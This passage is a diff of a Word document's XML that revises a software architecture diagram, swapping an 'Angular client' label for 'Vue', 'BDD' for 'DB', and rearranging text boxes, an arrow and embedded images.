+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="21098"/>
+                    <wp:lineTo x="21207" y="21098"/>
+                    <wp:lineTo x="21207" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapThrough>
+                <wp:docPr id="17" name="Zone de texte 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="523875" cy="409575"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:noFill/>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>ORM</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="1F9A3421" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:73.15pt;margin-top:22.05pt;width:41.25pt;height:32.25pt;z-index:251666430;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>ORM</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="through" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667455" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63C93DCD" wp14:editId="3A54D756">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>4243070</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>232410</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="752475" cy="381000"/>
+                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                <wp:wrapThrough wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="20520"/>
+                    <wp:lineTo x="21327" y="20520"/>
+                    <wp:lineTo x="21327" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapThrough>
+                <wp:docPr id="13" name="Zone de texte 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="752475" cy="381000"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:noFill/>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Rest</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> API</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="63C93DCD" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:334.1pt;margin-top:18.3pt;width:59.25pt;height:30pt;z-index:251667455;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Rest</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> API</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="through" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -1886,7 +2640,7 @@
                               <w:jc w:val="center"/>
                             </w:pPr>
                             <w:r>
-                              <w:t>Angular client</w:t>
+                              <w:t>Vue</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -1905,11 +2659,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
-              <v:shape id="Zone de texte 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:385.9pt;margin-top:19.05pt;width:82.5pt;height:36.75pt;z-index:251668480;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:385.9pt;margin-top:19.05pt;width:82.5pt;height:36.75pt;z-index:251668480;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -1917,211 +2667,7 @@
                         <w:jc w:val="center"/>
                       </w:pPr>
                       <w:r>
-                        <w:t>Angular client</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>1510030</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>241935</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="1143000" cy="466725"/>
-                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
-                <wp:wrapNone/>
-                <wp:docPr id="3" name="Zone de texte 3"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="1143000" cy="466725"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:srgbClr val="FFFFFF"/>
-                        </a:solidFill>
-                        <a:ln w="9525">
-                          <a:solidFill>
-                            <a:srgbClr val="000000"/>
-                          </a:solidFill>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:t>ORM</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:t>Spring Data JPA</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape id="Zone de texte 3" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:118.9pt;margin-top:19.05pt;width:90pt;height:36.75pt;z-index:251670528;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:t>ORM</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:t>Spring Data JPA</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>3234054</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>241935</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="942975" cy="466725"/>
-                <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
-                <wp:wrapNone/>
-                <wp:docPr id="2" name="Zone de texte 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="942975" cy="466725"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:srgbClr val="FFFFFF"/>
-                        </a:solidFill>
-                        <a:ln w="9525">
-                          <a:solidFill>
-                            <a:srgbClr val="000000"/>
-                          </a:solidFill>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:jc w:val="center"/>
-                            </w:pPr>
-                            <w:r>
-                              <w:t>Rest API Spring MVC</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:254.65pt;margin-top:19.05pt;width:74.25pt;height:36.75pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:jc w:val="center"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:t>Rest API Spring MVC</w:t>
+                        <w:t>Vue</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -2262,7 +2808,7 @@
                               <w:jc w:val="center"/>
                             </w:pPr>
                             <w:r>
-                              <w:t>BDD</w:t>
+                              <w:t>DB</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -2278,7 +2824,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="Zone de texte 4" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-.35pt;margin-top:19.15pt;width:69pt;height:36.75pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="Zone de texte 4" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-.35pt;margin-top:19.15pt;width:69pt;height:36.75pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2286,7 +2832,7 @@
                         <w:jc w:val="center"/>
                       </w:pPr>
                       <w:r>
-                        <w:t>BDD</w:t>
+                        <w:t>DB</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -2306,91 +2852,152 @@
           <w:noProof/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>2691130</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>156209</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="514350" cy="45719"/>
-                <wp:effectExtent l="19050" t="19050" r="38100" b="31115"/>
-                <wp:wrapNone/>
-                <wp:docPr id="8" name="Flèche : double flèche horizontale 8"/>
-                <wp:cNvGraphicFramePr/>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr/>
-                      <wps:spPr>
-                        <a:xfrm flipV="1">
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="514350" cy="45719"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="leftRightArrow">
-                          <a:avLst/>
-                        </a:prstGeom>
-                      </wps:spPr>
-                      <wps:style>
-                        <a:lnRef idx="2">
-                          <a:schemeClr val="accent1">
-                            <a:shade val="50000"/>
-                          </a:schemeClr>
-                        </a:lnRef>
-                        <a:fillRef idx="1">
-                          <a:schemeClr val="accent1"/>
-                        </a:fillRef>
-                        <a:effectRef idx="0">
-                          <a:schemeClr val="accent1"/>
-                        </a:effectRef>
-                        <a:fontRef idx="minor">
-                          <a:schemeClr val="lt1"/>
-                        </a:fontRef>
-                      </wps:style>
-                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
-                        <a:prstTxWarp prst="textNoShape">
-                          <a:avLst/>
-                        </a:prstTxWarp>
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shapetype w14:anchorId="56A8CE7C" id="_x0000_t69" coordsize="21600,21600" o:spt="69" adj="4320,5400" path="m,10800l@0,21600@0@3@2@3@2,21600,21600,10800@2,0@2@1@0@1@0,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:formulas>
-                  <v:f eqn="val #0"/>
-                  <v:f eqn="val #1"/>
-                  <v:f eqn="sum 21600 0 #0"/>
-                  <v:f eqn="sum 21600 0 #1"/>
-                  <v:f eqn="prod #0 #1 10800"/>
-                  <v:f eqn="sum #0 0 @4"/>
-                  <v:f eqn="sum 21600 0 @5"/>
-                </v:formulas>
-                <v:path o:connecttype="custom" o:connectlocs="@2,0;10800,@1;@0,0;0,10800;@0,21600;10800,@3;@2,21600;21600,10800" o:connectangles="270,270,270,180,90,90,90,0" textboxrect="@5,@1,@6,@3"/>
-                <v:handles>
-                  <v:h position="#0,#1" xrange="0,10800" yrange="0,10800"/>
-                </v:handles>
-              </v:shapetype>
-              <v:shape id="Flèche : double flèche horizontale 8" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:211.9pt;margin-top:12.3pt;width:40.5pt;height:3.6pt;flip:y;z-index:251674624;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:middle" o:gfxdata="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" adj="960" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>233680</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>194310</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="404495" cy="533400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapThrough wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="20829"/>
+                <wp:lineTo x="20345" y="20829"/>
+                <wp:lineTo x="20345" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapThrough>
+            <wp:docPr id="16" name="Image 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="404495" cy="533400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>5234305</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>222250</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="428625" cy="457200"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:wrapThrough wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="20700"/>
+                <wp:lineTo x="21120" y="20700"/>
+                <wp:lineTo x="21120" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapThrough>
+            <wp:docPr id="11" name="Image 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="428625" cy="457200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2459,7 +3066,23 @@
